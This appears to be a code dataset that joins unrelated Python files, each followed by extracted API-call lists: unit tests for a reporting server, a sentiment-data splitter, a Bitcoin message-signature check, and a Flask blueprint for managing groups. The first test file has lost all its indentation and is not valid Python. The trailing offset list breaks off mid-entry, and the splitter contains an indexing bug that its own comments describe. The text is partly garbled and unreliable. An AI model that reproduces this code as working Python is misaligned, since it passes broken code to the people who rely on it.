`Unittests for reporting server functions`
"""
import sys
import os
import pytest
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '../reporting')))
from reporting.reporting_server import XMLReportingServer, imp_plugins
xmlrpcsrv = XMLReportingServer()
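# NOTE: this module-level server instance is not used by the tests below;
# the reporting_server fixture constructs and configures its own.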
@pytest.fixture(scope="function", autouse=True)
def reporting_server():
class CustomOptsParser(object):
def __init__(self):
self.multiuser = True
self.port = '18081'
self.logprefix = 'main'
self.logdir = 'logs'
self.loglevel = 'DEBUG'
opts = CustomOptsParser()
xmlrpcsrv = XMLReportingServer()
xmlrpcsrv.setup(opts)
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), "../plugins/", './')))
imp_plugins("reports")
imp_plugins("connectors")
return xmlrpcsrv
@pytest.fixture(scope="function", autouse=True)
def reporting_server_with_config(reporting_server):
reporting_server.xmlrpc_open("test_client-1")
reporting_server.xmlrpc_reportadd("test_client-1", "xml")
reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "options", [['update', None]])
reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "cfgfile", None)
reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "info_dict", None)
reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "info_dict", ['chipName', 'SomeSwitch'])
reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "info_dict", ['TM buildname', '192.168.127.12-SomeSwitch'])
reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "htmlfile", "1.html")
reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "htmlcfg", None)
return reporting_server
def test_client_config(reporting_server):
"""Verify that client config can be created and reports can be removed.
"""
reporting_server.xmlrpc_open("test_client-1")
# check if status of client is Active
assert reporting_server.clients.get("test_client-1", "status") == "Active"
# add xml report
reporting_server.xmlrpc_reportadd("test_client-1", "xml")
assert reporting_server.clients.get("test_client-1", "reports") == {"xml": True}
reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "htmlfile", "1.html")
# check attr on report object
assert reporting_server._reports['XML']['test_client-1'].htmlfile == "1.html"
reporting_server.xmlrpc_shutdown()
def test_post(reporting_server_with_config):
"""Verify that post command is True.
"""
post_data1 = ["test_client-1", "SomeSwitch", "test.test_suite", "test_tcname",
"Run", ['Simple brief of test case', '-# First step\n-# Second step'],
{'platform': 'SomeSwitch', 'build': '192.168.127.12-SomeSwitch'}, "None"]
# Check if post successful
assert reporting_server_with_config.xmlrpc_post(*post_data1), "xmlrpc_post operation is False"
# Check if queuelen works
def test_queue(reporting_server_with_config):
"""Verify that operation with queue is working.
"""
expected_queuelist = [{'status': 'Run', 'info': {'platform': 'SomeSwitch',
'build': '1.2.3.4-SomeSwitch'}, 'client': 'test_client-1',
'build': 'SomeSwitch',
'report': ['Simple brief of test case', '-# First step\n-# Second step'],
'suite': 'test.test_suite', 'tc': 'test_tcname', 'build_info': 'None'}]
post_data1 = ["test_client-1", "SomeSwitch", "test.test_suite", "test_tcname",
"Run", ['Simple brief of test case', '-# First step\n-# Second step'],
{'platform': 'SomeSwitch', 'build': '1.2.3.4-SomeSwitch'}, "None"]
# Check if queue is empty
assert reporting_server_with_config.xmlrpc_queuelist() == [], "Queuelen is not empty"
# Send post request
reporting_server_with_config.xmlrpc_post(*post_data1)
# Get queue list
assert reporting_server_with_config.xmlrpc_queuelist() == expected_queuelist
# Check if queuelen is 1
assert reporting_server_with_config.xmlrpc_queuelen() == 1, "Queuelen is not right"
# Call queuedropcmd and check queuelen
assert reporting_server_with_config.xmlrpc_queuedropcmd(0) == expected_queuelist[0]
assert reporting_server_with_config.xmlrpc_queuelen() == 0
def test_cmdproc(reporting_server_with_config):
"""Verify that operation with cmdproc is work.
"""
reporting_server_with_config.xmlrpc_cmdprocdisable()
assert reporting_server_with_config.xmlrpc_cmdproccheck() == "Watchdog is False and cmdproc is True", "Watchdog is False. cmdprocdisable doesn't work."
reporting_server_with_config.xmlrpc_cmdprocenable()
assert reporting_server_with_config.xmlrpc_cmdproccheck() == "Watchdog is True and cmdproc is True", "Watchdog is True. cmdprocdisable doesn't work."
|
[
"reporting.reporting_server.XMLReportingServer",
"os.path.dirname",
"pytest.fixture",
"reporting.reporting_server.imp_plugins"
] |
[((887, 907), 'reporting.reporting_server.XMLReportingServer', 'XMLReportingServer', ([], {}), '()\n', (905, 907), False, 'from reporting.reporting_server import XMLReportingServer, imp_plugins\n'), ((911, 957), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""function"""', 'autouse': '(True)'}), "(scope='function', autouse=True)\n", (925, 957), False, 'import pytest\n'), ((1599, 1645), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""function"""', 'autouse': '(True)'}), "(scope='function', autouse=True)\n", (1613, 1645), False, 'import pytest\n'), ((1372, 1392), 'reporting.reporting_server.XMLReportingServer', 'XMLReportingServer', ([], {}), '()\n', (1390, 1392), False, 'from reporting.reporting_server import XMLReportingServer, imp_plugins\n'), ((1522, 1544), 'reporting.reporting_server.imp_plugins', 'imp_plugins', (['"""reports"""'], {}), "('reports')\n", (1533, 1544), False, 'from reporting.reporting_server import XMLReportingServer, imp_plugins\n'), ((1549, 1574), 'reporting.reporting_server.imp_plugins', 'imp_plugins', (['"""connectors"""'], {}), "('connectors')\n", (1560, 1574), False, 'from reporting.reporting_server import XMLReportingServer, imp_plugins\n'), ((758, 783), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (773, 783), False, 'import os\n'), ((1468, 1493), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1483, 1493), False, 'import os\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
data4models.py
# Sentiment Indentification for Roman Urdu
'''
import numpy as np
import pandas as pd
class Data:
# Constructor
def __init__( self, config ):
self.config = config
def split( self, df ):
'''
Split the (entire) data into training data & test data
'''
assert isinstance( df, pd.DataFrame), 'df must be a pandas.DataFrame.'
test_split_ratio = self.config.test_split_ratio
print(f'Data.preprocess.split: test_split_ratio= {test_split_ratio}' )
reviews = df['review']
sentiments = df['sentiment']
n_dataset = df.shape[0]
        n_test     = int( n_dataset * test_split_ratio )  # the test portion
        n_training = n_dataset - n_test                   # the remaining training portion
        # Use indexing to split the data.
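        # e.g. (hypothetical numbers) n_dataset = 10000, test_split_ratio = 0.3
        #      --> n_test = 3000, n_training = 7000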
index_data = np.arange( n_dataset )
index_training = np.random.choice( index_data, n_training, replace=False )
index_test = np.delete( index_data, index_training )
data_training_np = reviews.loc[ index_training ].values
data_test_np = reviews.loc[ index_test ].values
labels_training_np = sentiments.loc[ index_training ].values
labels_test_np = sentiments.loc[ index_test ].values
        print( ' number of samples  =', n_dataset )
        print( ' np.shape(x_train)  =', np.shape(data_training_np) )
        print( ' np.shape(y_train)  =', np.shape(labels_training_np) )
        print( ' np.shape(x_test)   =', np.shape(data_test_np) )
        print( ' np.shape(y_test)   =', np.shape(labels_test_np) )
return data_training_np, labels_training_np, data_test_np, labels_test_np
# x_train, y_train, x_test, y_test
# def __init__( self, x, y, config ):
# self.config = config
# self.x = x # shape = (length, dimension)
# self.y = y # shape = (length,)
    # NOTE: renamed from `split` so it no longer shadows the DataFrame-based
    # split() defined above (two methods with the same name cannot coexist).
    def split_train_eval_test( self, split_rate=[0.7, 0.2, 0.1] ):
'''
The default ratio to split the training, evaluation, & test data is 7:2:1.
'''
print( 'split_rate = ', split_rate )
length, dimension = np.shape( self.x )
# Split the (entire) data into training data & test data
n_training = int( length * split_rate[0] ) # 0.7
n_evaluation = int( length * split_rate[1] ) # 0.2
n_test = length - n_training - n_evaluation
        # Use indexing to split the data.
index_data = np.arange( length ) # 13704, [0, length-1]
index_training = np.random.choice( index_data, n_training, replace=False ) # 9592
index_temp = np.delete( index_data, index_training ) # 4112
        index_evaluation = np.random.choice( index_temp, n_evaluation, replace=False ) # 2740
        # index_evaluation holds index *values*, while np.delete() expects
        # *positions*, so take a set difference instead; with the fixes above
        # this yields the expected 1372 test indices.
        index_test       = np.setdiff1d( index_temp, index_evaluation )
data_training = self.x[ index_training, : ]
data_evaluation = self.x[ index_evaluation, : ]
data_test = self.x[ index_test, : ]
labels_training = self.y[ index_training ]
labels_evaluation = self.y[ index_evaluation ]
labels_test = self.y[ index_test ]
training = [data_training, labels_training]
evaluation = [data_evaluation, labels_evaluation]
test = [data_test, labels_test]
return training, evaluation, test
# #=====================================================================#
# # The above variables don't have the leading self. to improve readability.
# self.length = length # = size, or n_data
# self.dimension = dimension
#
# self.n_training = n_training
# self.n_test = n_test
def load(self, batch_size):
data_length = len( self.data_training )
if data_length >= batch_size:
# Because of replace=False,
# ValueError: Cannot take a larger sample than population when 'replace=False'
index = np.random.choice( data_length, batch_size, replace=False )
data = self.data_training[ index,: ]
labels = self.labels_training[ index ]
self.data_training = np.delete( self.data_training, index, axis=0 )
self.labels_training = np.delete( self.labels_training, index )
done = True
        else:  # data_length < batch_size: serve the remainder and refill
            data = self.data_training
            labels = self.labels_training
            # NOTE: assumes self.index_training was set by the alternate
            # constructor that is commented out above.
            self.data_training = self.x[ self.index_training ]
            self.labels_training = self.y[ self.index_training ]
            done = False
return data, labels, done
# EOF
|
[
"numpy.shape",
"numpy.arange",
"numpy.delete",
"numpy.random.choice"
] |
[((927, 947), 'numpy.arange', 'np.arange', (['n_dataset'], {}), '(n_dataset)\n', (936, 947), True, 'import numpy as np\n'), ((976, 1031), 'numpy.random.choice', 'np.random.choice', (['index_data', 'n_training'], {'replace': '(False)'}), '(index_data, n_training, replace=False)\n', (992, 1031), True, 'import numpy as np\n'), ((1060, 1097), 'numpy.delete', 'np.delete', (['index_data', 'index_training'], {}), '(index_data, index_training)\n', (1069, 1097), True, 'import numpy as np\n'), ((2284, 2300), 'numpy.shape', 'np.shape', (['self.x'], {}), '(self.x)\n', (2292, 2300), True, 'import numpy as np\n'), ((2630, 2647), 'numpy.arange', 'np.arange', (['length'], {}), '(length)\n', (2639, 2647), True, 'import numpy as np\n'), ((2702, 2757), 'numpy.random.choice', 'np.random.choice', (['index_data', 'n_training'], {'replace': '(False)'}), '(index_data, n_training, replace=False)\n', (2718, 2757), True, 'import numpy as np\n'), ((2796, 2833), 'numpy.delete', 'np.delete', (['index_data', 'index_training'], {}), '(index_data, index_training)\n', (2805, 2833), True, 'import numpy as np\n'), ((2882, 2924), 'numpy.random.choice', 'np.random.choice', (['index_temp', 'n_evaluation'], {}), '(index_temp, n_evaluation)\n', (2898, 2924), True, 'import numpy as np\n'), ((2962, 3001), 'numpy.delete', 'np.delete', (['index_temp', 'index_evaluation'], {}), '(index_temp, index_evaluation)\n', (2971, 3001), True, 'import numpy as np\n'), ((1488, 1514), 'numpy.shape', 'np.shape', (['data_training_np'], {}), '(data_training_np)\n', (1496, 1514), True, 'import numpy as np\n'), ((1558, 1586), 'numpy.shape', 'np.shape', (['labels_training_np'], {}), '(labels_training_np)\n', (1566, 1586), True, 'import numpy as np\n'), ((1630, 1652), 'numpy.shape', 'np.shape', (['data_test_np'], {}), '(data_test_np)\n', (1638, 1652), True, 'import numpy as np\n'), ((1696, 1720), 'numpy.shape', 'np.shape', (['labels_test_np'], {}), '(labels_test_np)\n', (1704, 1720), True, 'import numpy as np\n'), ((4261, 4317), 'numpy.random.choice', 'np.random.choice', (['data_length', 'batch_size'], {'replace': '(False)'}), '(data_length, batch_size, replace=False)\n', (4277, 4317), True, 'import numpy as np\n'), ((4475, 4519), 'numpy.delete', 'np.delete', (['self.data_training', 'index'], {'axis': '(0)'}), '(self.data_training, index, axis=0)\n', (4484, 4519), True, 'import numpy as np\n'), ((4558, 4596), 'numpy.delete', 'np.delete', (['self.labels_training', 'index'], {}), '(self.labels_training, index)\n', (4567, 4596), True, 'import numpy as np\n')]
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jul 4 22:46:11 2018
"""
import BTC_P2PKH_sigvef as bv
# verifying two P2PKH Bitcoin signed messages
address = 'bitcoin:16vqGo3KRKE9kTsTZxKoJKLzwZGTodK3ce'
signature = ('HPDs1TesA48a9up4QORIuub67VHBM37X66skAYz0Esg23gdfMu'+
'CTYDFORc6XGpKZ2/flJ2h/DUF569FJxGoVZ50=')
message = 'test message'
bv.sig_vef_P2PKH(address, signature, message)
address2 = "<KEY>"
message2 = "test message"
signature2 = ("IPn9bbEdNUp6+bneZqE2YJbq9Hv5aNILq9E" +
"5eZoMSF3/fBX4zjeIN6fpXfGSGPrZyKfHQ/c/kTSP+NIwmyTzMfk=")
bv.sig_vef_P2PKH(address2, signature2, message2)
|
[
"BTC_P2PKH_sigvef.sig_vef_P2PKH"
] |
[((344, 389), 'BTC_P2PKH_sigvef.sig_vef_P2PKH', 'bv.sig_vef_P2PKH', (['address', 'signature', 'message'], {}), '(address, signature, message)\n', (360, 389), True, 'import BTC_P2PKH_sigvef as bv\n'), ((561, 609), 'BTC_P2PKH_sigvef.sig_vef_P2PKH', 'bv.sig_vef_P2PKH', (['address2', 'signature2', 'message2'], {}), '(address2, signature2, message2)\n', (577, 609), True, 'import BTC_P2PKH_sigvef as bv\n')]
|
'''
basic blueprint routes for interacting with an AG
'''
# import third party modules
import re
from flask import Blueprint, request, jsonify, g, url_for, flash, redirect
from sqlalchemy.sql import exists, and_
from werkzeug.exceptions import BadRequest, PreconditionFailed
# import database instance
from app.models import db
# import app with config etc.
from app import app
# import database models
from app.models.ag import AG, AGSchema, AGSchemaIntern
from app.models.associations import UserAG
# import utilities
from app.util import requires_auth
from app.util.assocations import requires_mentor, requires_member_association
from app.util.ag import requires_ag
from app.util.user import get_user_by_username
# import additional blueprints regarding applications, invitations and messages of ags
from app.blueprints.api.v1.ag import applications, invitations, messages
# import regex config for creating an ag
from config.regex import AGRegex
# declare the blueprint variable for this blueprint
bp = Blueprint('ag_api', __name__)
# register the additional blueprints
app.register_blueprint(invitations.bp, url_prefix='/invitations')
app.register_blueprint(applications.bp, url_prefix='/applications')
app.register_blueprint(messages.bp, url_prefix='/messages')
# declare the needed marshmallow schemas
ag_schema_intern = AGSchemaIntern()
ag_schema = AGSchema()
ags_schema = AGSchema(many=True)
@bp.route('/', methods=['POST'])
# check that the requester is authenticated/logined
@requires_auth()
def add_ag():
'''
Create a new AG. The request body has to include the following:
:key: name: AG name used to identify the ag (eg. /ag/<name>)
:key: display_name: AG name that is human read able
(can contain spaces etc.)
:key: description: A description of the AG
:return: If everything went as it should, the newly created AG is
returned.
'''
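    # A minimal request sketch (hypothetical mount point; field names come
    # from the docstring above):
    #   POST <prefix>/  with form fields
    #   name=chess, display_name=Chess Club, description=Weekly blitz rounds
    # A name that is taken or fails AGRegex.name returns {'reason': 'name'}, 400.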
# read request values
name = request.values.get('name')
display_name = request.values.get('display_name')
description = request.values.get('description')
    # check that the ag name and display name are not already in use and
    # check that the values match the regex patterns
    # if something isn't right, return an error message
if db.session.query(exists().where(AG.name == name)).scalar() or not bool(
re.match(AGRegex.name, name)):
return jsonify({'reason': 'name'}), 400
if db.session.query(exists().where(AG.display_name == display_name)).scalar() or not bool(
re.match(AGRegex.display_name, display_name)):
return jsonify({'reason': 'display_name'}), 400
if not bool(re.match(AGRegex.description, description)):
return jsonify({'reason': 'description'}), 400
# create a new database AG entry
ag: AG = AG()
ag.name = name
ag.display_name = display_name
ag.description = description
ag.color = request.values.get('color', default='primary')
# Add the AG entry to the DB to create a new id
db.session.add(ag)
db.session.flush()
# Create the association entry to the creating user, so he is added as mentor
user_ag = UserAG()
user_ag.user_id = g.session.user_id
user_ag.ag_id = ag.id
user_ag.status = 'ACTIVE'
user_ag.role = 'MENTOR'
# add the association entry and save the database changes
db.session.add(user_ag)
db.session.commit()
# return a success message
return jsonify({'status': 'success', 'redirect': url_for('ag.invite_ag', ag_name=ag.name)}), 200
@bp.route('/id/<ag_id>', methods=['GET'])
# check that the requester is authenticated/logined
@requires_auth()
# check that the ag with the ag_id exist and add it to the params/kwargs
@requires_ag()
def get_ag_by_id(ag_id, ag):
'''
Query an AG specified by its id
:param ag_id: A specific id
:return: JSON representation of the AG
'''
# if the requester is a member of the ag --> return the schema for a member
    # else --> return the schema for a foreign user
    # (combine the filters with sqlalchemy's and_(); a plain Python `and`
    #  inside .where() would silently drop the first condition)
    if db.session.query(exists().where(and_(UserAG.user_id == g.session.user_id,
                                          UserAG.ag_id == ag_id))).scalar():
return ag_schema_intern.jsonify(ag), 200
else:
return ag_schema.jsonify(ag), 200
@bp.route('/name/<ag_name>', methods=['GET'])
# check that the requester is authenticated/logined
@requires_auth()
# check that the ag with the ag_name exist and add it to the params/kwargs
@requires_ag()
def get_ag_by_name(ag_name, ag):
'''
Query an AG specified by its unique name
:param name: A specific AG name
:return: JSON representation of the AG
'''
# if the requester is a member of the ag --> return the schema for a member
    # else --> return the schema for a foreign user
    if db.session.query(exists().where(and_(UserAG.user_id == g.session.user_id,
                                          UserAG.ag_id == ag.id))).scalar():
return ag_schema_intern.jsonify(ag), 200
else:
return ag_schema.jsonify(ag), 200
@bp.route('/<ag_id>', methods=['PUT'])
# check that the requester is authenticated/logined
@requires_auth()
# check that the requester is a mentor of the ag
# add the user_ag association and the ag to the params/kwargs
@requires_mentor()
def change_ag_values(ag_id, ag, user_ag):
'''
Change values of an AG.
The request body may include the following:
:key: display_name: String with new display_name
:key: description: String with new description
    :param ag_id: id of the AG whose values should be changed
:return:
'''
    # read the request values
display_name = request.values.get('display_name', default=None)
description = request.values.get('description', default=None)
value_changed = False
# checks if the display_name or description got transmitted
# if so update the ag entry
if display_name is not None and bool(re.match(AGRegex.display_name, display_name)):
ag.display_name = display_name
value_changed = True
if description is not None and bool(re.match(AGRegex.description, description)):
ag.description = description
value_changed = True
# if some value got changed, merge the entry to the database and return a success message
if value_changed:
db.session.merge(ag)
db.session.commit()
return jsonify({'status': 'success'}), 200
# else return a BadRequest message
else:
return BadRequest()
@bp.route('/', methods=['GET'])
# check that the requester is authenticated/logined
@requires_auth()
def get_all_ags():
'''
Query up to 20 ags
The request body may include the following:
    :key: count: Int with how many AGs to return
--> if greater than 20, it will be set to 20
:default: 5
:key: offset: Int how many entries to skip
:default: 0
:return: JSON Representation of the AGs
'''
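    # e.g. GET <prefix>/?count=10&offset=20 -> AGs 21-30 (hypothetical mount
    # point; count is capped at 20 below)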
# read request params and set default if not set
count = request.args.get('count', default=5, type=int)
offset = request.args.get('offset', default=0, type=int)
# adjust to a max of 20
if count > 20:
count = 20
# query all ags (with limit and offset)
all_ags = AG.query.offset(offset).limit(count).all()
# return a json representation
return ags_schema.jsonify(all_ags)
@bp.route('<ag_name>/submit_setting', methods=['GET'])
# check that the requester is authenticated/logined
@requires_auth()
# check that the requester is a mentor of the ag
# add the user_ag association and the ag to the params/kwargs
@requires_mentor()
def update_users(ag_name, user_ag, ag):
'''
Update the roles of users in an ag
The Request body includes following:
:key: <user_id>: unique database id of the user
--> :value: <role> --> 'MENTOR' or 'PARTICIPIANT'
:param ag_name: ag_name of the ag to be edited
automatic filled params
    :param user_ag: database entry of the association between the request user and the ag
--> get filled by @requires_mentor
:param ag: database entry of the ag
--> get filled by @requires_mentor
:return: redirect to the ag dashboard
'''
    # for every key in request values --> for every user/user_id passed by the form
for user_id in request.values:
# the role the user got assigned to be
role = request.values.get(user_id)
        # query the database entry of the association between the user to be edited and the ag
edit_user_ag = db.session.query(UserAG).filter(and_(UserAG.user_id == user_id,\
UserAG.ag_id == ag.id)).scalar()
# if there is an result for this user <==> the user is in the ag
if edit_user_ag:
# update his role and simulate the changes
edit_user_ag.role = role
db.session.flush()
# if there are no mentors left
if not ag.mentors:
# throw error
flash(u'An AG needs a minimum of one Mentor', 'error')
return redirect(url_for('ag.ag_settings', ag_name=ag_name))
# if there are still mentors
# --> save changes to the database and redirect to the ag dashboard
db.session.commit()
flash(f'Successfully changed the roles in {ag.display_name}', 'success')
return redirect(url_for('ag.ag_dashboard', ag_name=ag_name))
@bp.route('<ag_name>/leave')
# check that the requester is authenticated/logined
@requires_auth()
# check if the requester has a association to the ag
# add the association and the ag to the params/kwargs
@requires_member_association()
def leave_ag(ag_name, ag, user_ag):
'''
leave the specified ag
:param ag_name: name of the ag to leave
automatic filled params
    :param user_ag: database entry of the association between the request user and the ag
--> get filled by @requires_member_association
:param ag: database entry of the ag
--> get filled by @requires_member_association
:return: redirect to the dashboard
'''
    # if the user is not an actual user of the ag
    # return an error message
if user_ag.role == 'NONE':
flash('You cannot leave an AG you are not in', 'error')
return redirect(url_for('ag.ag_dashboard', ag_name=ag_name))
# else: update the entry, so the user is no member anymore and left the ag
user_ag.role = 'NONE'
user_ag.status = 'LEFT'
# simulate the changes
db.session.flush()
# if there are no members left in the ag
if not ag.actual_users:
# delete the ag
db.session.delete(ag)
db.session.flush()
# save a success message
        flash(f'You successfully left and deleted the AG {ag.name}', 'success')
# else if there are no mentors left, but still members
elif not ag.mentors:
        # return an error message
        # don't save the changes to the database and return to the ag dashboard
        flash('You cannot leave an AG when there is no Mentor left afterwards', 'error')
return redirect(url_for('ag.ag_dashboard', ag_name=ag_name))
# else
else:
# save a success message
        flash(f'You successfully left the AG {ag.name}', 'success')
    # save the changes to the database and return with the saved success message to the dashboard
db.session.commit()
return redirect(url_for('index'))
@bp.route('<ag_name>/kick/<user_name>')
# check that the requester is authenticated/logined
@requires_auth()
# check that the requester is a mentor of the ag
# add the user_ag association and the ag to the params/kwargs
@requires_mentor()
def kick_user(ag_name, user_name, ag, user_ag):
'''
kick a user out of an ag
:param ag_name: name of the ag to kick the user out
:param user_name: username of the user to be kicked out
automatic filled params
    :param user_ag: database entry of the association between the request user and the ag
--> get filled by @requires_member_association
:param ag: database entry of the ag
--> get filled by @requires_member_association
:return: redirect to the dashboard
'''
    # query the user and his association
user = get_user_by_username(user_name)
edit_user_ag = db.session.query(UserAG).filter_by(user_id=user.id, ag_id=ag.id).scalar()
# if the user is not an actual user
if edit_user_ag is None or edit_user_ag.role == 'NONE':
# return to the ag dashboard with a error message
flash(f'You cannot kick {user.username} from {ag.display_name}.')
return redirect(url_for('ag.ag_dashboard', ag_name=ag_name))
# else
# change the association entry, so the user is not a member of the ag anymore
# and his status is kicked
edit_user_ag.role = 'NONE'
edit_user_ag.status = 'KICKED'
# simulate the changes
db.session.flush()
# if there are no members left
if not ag.actual_users:
# delete the ag and return to the dashboard
db.session.delete(ag)
db.session.commit()
        flash(f'You successfully left and deleted the AG {ag.display_name}', 'success')
return redirect(url_for('index'))
# else if there are no mentors left
elif not ag.mentors:
# save a error message
flash(f'You cannot kick the last Mentor of {ag.display_name}', 'error')
# else
else:
# save a success message and save the changes to the database
        flash(f'You successfully kicked {user.username} from the AG {ag.display_name}', 'success')
db.session.commit()
# return to the ag dashboard
return redirect(url_for('ag.ag_dashboard', ag_name=ag_name))
@bp.route('<ag_name>/delete')
# check that the requester is authenticated/logined
@requires_auth()
# check that the requester is a mentor of the ag
# add the user_ag association and the ag to the params/kwargs
@requires_mentor()
def delete_ag(ag_name, ag, user_ag):
'''
delete an ag
:param ag_name: name of the ag to be deleted
automatic filled params
    :param user_ag: database entry of the association between the request user and the ag
--> get filled by @requires_member_association
:param ag: database entry of the ag
--> get filled by @requires_member_association
:return: redirect to the dashboard
'''
# delete the ag
db.session.delete(ag)
# save the changes
db.session.commit()
# return to the dashboard with a success message
flash(f'You successfully deleted the AG {ag.display_name}', 'success')
return redirect(url_for('index'))
|
[
"flask.flash",
"werkzeug.exceptions.BadRequest",
"sqlalchemy.sql.and_",
"app.util.assocations.requires_mentor",
"flask.url_for",
"flask.jsonify",
"app.models.db.session.commit",
"app.util.assocations.requires_member_association",
"flask.request.args.get",
"app.models.db.session.query",
"app.app.register_blueprint",
"app.models.db.session.delete",
"app.models.db.session.flush",
"app.models.associations.UserAG",
"app.models.ag.AGSchemaIntern",
"flask.Blueprint",
"app.util.ag.requires_ag",
"sqlalchemy.sql.exists",
"app.models.ag.AG",
"flask.request.values.get",
"app.models.db.session.merge",
"re.match",
"app.util.requires_auth",
"app.models.ag.AG.query.offset",
"app.util.user.get_user_by_username",
"app.models.ag.AGSchema",
"app.models.db.session.add"
] |
[((1014, 1043), 'flask.Blueprint', 'Blueprint', (['"""ag_api"""', '__name__'], {}), "('ag_api', __name__)\n", (1023, 1043), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((1082, 1147), 'app.app.register_blueprint', 'app.register_blueprint', (['invitations.bp'], {'url_prefix': '"""/invitations"""'}), "(invitations.bp, url_prefix='/invitations')\n", (1104, 1147), False, 'from app import app\n'), ((1148, 1215), 'app.app.register_blueprint', 'app.register_blueprint', (['applications.bp'], {'url_prefix': '"""/applications"""'}), "(applications.bp, url_prefix='/applications')\n", (1170, 1215), False, 'from app import app\n'), ((1216, 1275), 'app.app.register_blueprint', 'app.register_blueprint', (['messages.bp'], {'url_prefix': '"""/messages"""'}), "(messages.bp, url_prefix='/messages')\n", (1238, 1275), False, 'from app import app\n'), ((1336, 1352), 'app.models.ag.AGSchemaIntern', 'AGSchemaIntern', ([], {}), '()\n', (1350, 1352), False, 'from app.models.ag import AG, AGSchema, AGSchemaIntern\n'), ((1365, 1375), 'app.models.ag.AGSchema', 'AGSchema', ([], {}), '()\n', (1373, 1375), False, 'from app.models.ag import AG, AGSchema, AGSchemaIntern\n'), ((1389, 1408), 'app.models.ag.AGSchema', 'AGSchema', ([], {'many': '(True)'}), '(many=True)\n', (1397, 1408), False, 'from app.models.ag import AG, AGSchema, AGSchemaIntern\n'), ((1496, 1511), 'app.util.requires_auth', 'requires_auth', ([], {}), '()\n', (1509, 1511), False, 'from app.util import requires_auth\n'), ((3629, 3644), 'app.util.requires_auth', 'requires_auth', ([], {}), '()\n', (3642, 3644), False, 'from app.util import requires_auth\n'), ((3719, 3732), 'app.util.ag.requires_ag', 'requires_ag', ([], {}), '()\n', (3730, 3732), False, 'from app.util.ag import requires_ag\n'), ((4344, 4359), 'app.util.requires_auth', 'requires_auth', ([], {}), '()\n', (4357, 4359), False, 'from app.util import requires_auth\n'), ((4436, 4449), 'app.util.ag.requires_ag', 'requires_ag', ([], {}), '()\n', (4447, 4449), False, 'from app.util.ag import requires_ag\n'), ((5073, 5088), 'app.util.requires_auth', 'requires_auth', ([], {}), '()\n', (5086, 5088), False, 'from app.util import requires_auth\n'), ((5201, 5218), 'app.util.assocations.requires_mentor', 'requires_mentor', ([], {}), '()\n', (5216, 5218), False, 'from app.util.assocations import requires_mentor, requires_member_association\n'), ((6538, 6553), 'app.util.requires_auth', 'requires_auth', ([], {}), '()\n', (6551, 6553), False, 'from app.util import requires_auth\n'), ((7447, 7462), 'app.util.requires_auth', 'requires_auth', ([], {}), '()\n', (7460, 7462), False, 'from app.util import requires_auth\n'), ((7575, 7592), 'app.util.assocations.requires_mentor', 'requires_mentor', ([], {}), '()\n', (7590, 7592), False, 'from app.util.assocations import requires_mentor, requires_member_association\n'), ((9442, 9457), 'app.util.requires_auth', 'requires_auth', ([], {}), '()\n', (9455, 9457), False, 'from app.util import requires_auth\n'), ((9566, 9595), 'app.util.assocations.requires_member_association', 'requires_member_association', ([], {}), '()\n', (9593, 9595), False, 'from app.util.assocations import requires_mentor, requires_member_association\n'), ((11471, 11486), 'app.util.requires_auth', 'requires_auth', ([], {}), '()\n', (11484, 11486), False, 'from app.util import requires_auth\n'), ((11496, 11513), 'app.util.assocations.requires_mentor', 'requires_mentor', ([], {}), '()\n', (11511, 11513), False, 'from app.util.assocations import requires_mentor, 
requires_member_association\n'), ((11626, 11643), 'app.util.assocations.requires_mentor', 'requires_mentor', ([], {}), '()\n', (11641, 11643), False, 'from app.util.assocations import requires_mentor, requires_member_association\n'), ((13775, 13790), 'app.util.requires_auth', 'requires_auth', ([], {}), '()\n', (13788, 13790), False, 'from app.util import requires_auth\n'), ((13903, 13920), 'app.util.assocations.requires_mentor', 'requires_mentor', ([], {}), '()\n', (13918, 13920), False, 'from app.util.assocations import requires_mentor, requires_member_association\n'), ((1946, 1972), 'flask.request.values.get', 'request.values.get', (['"""name"""'], {}), "('name')\n", (1964, 1972), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((1992, 2026), 'flask.request.values.get', 'request.values.get', (['"""display_name"""'], {}), "('display_name')\n", (2010, 2026), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((2045, 2078), 'flask.request.values.get', 'request.values.get', (['"""description"""'], {}), "('description')\n", (2063, 2078), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((2801, 2805), 'app.models.ag.AG', 'AG', ([], {}), '()\n', (2803, 2805), False, 'from app.models.ag import AG, AGSchema, AGSchemaIntern\n'), ((2908, 2954), 'flask.request.values.get', 'request.values.get', (['"""color"""'], {'default': '"""primary"""'}), "('color', default='primary')\n", (2926, 2954), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((3012, 3030), 'app.models.db.session.add', 'db.session.add', (['ag'], {}), '(ag)\n', (3026, 3030), False, 'from app.models import db\n'), ((3035, 3053), 'app.models.db.session.flush', 'db.session.flush', ([], {}), '()\n', (3051, 3053), False, 'from app.models import db\n'), ((3151, 3159), 'app.models.associations.UserAG', 'UserAG', ([], {}), '()\n', (3157, 3159), False, 'from app.models.associations import UserAG\n'), ((3351, 3374), 'app.models.db.session.add', 'db.session.add', (['user_ag'], {}), '(user_ag)\n', (3365, 3374), False, 'from app.models import db\n'), ((3379, 3398), 'app.models.db.session.commit', 'db.session.commit', ([], {}), '()\n', (3396, 3398), False, 'from app.models import db\n'), ((5604, 5652), 'flask.request.values.get', 'request.values.get', (['"""display_name"""'], {'default': 'None'}), "('display_name', default=None)\n", (5622, 5652), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((5671, 5718), 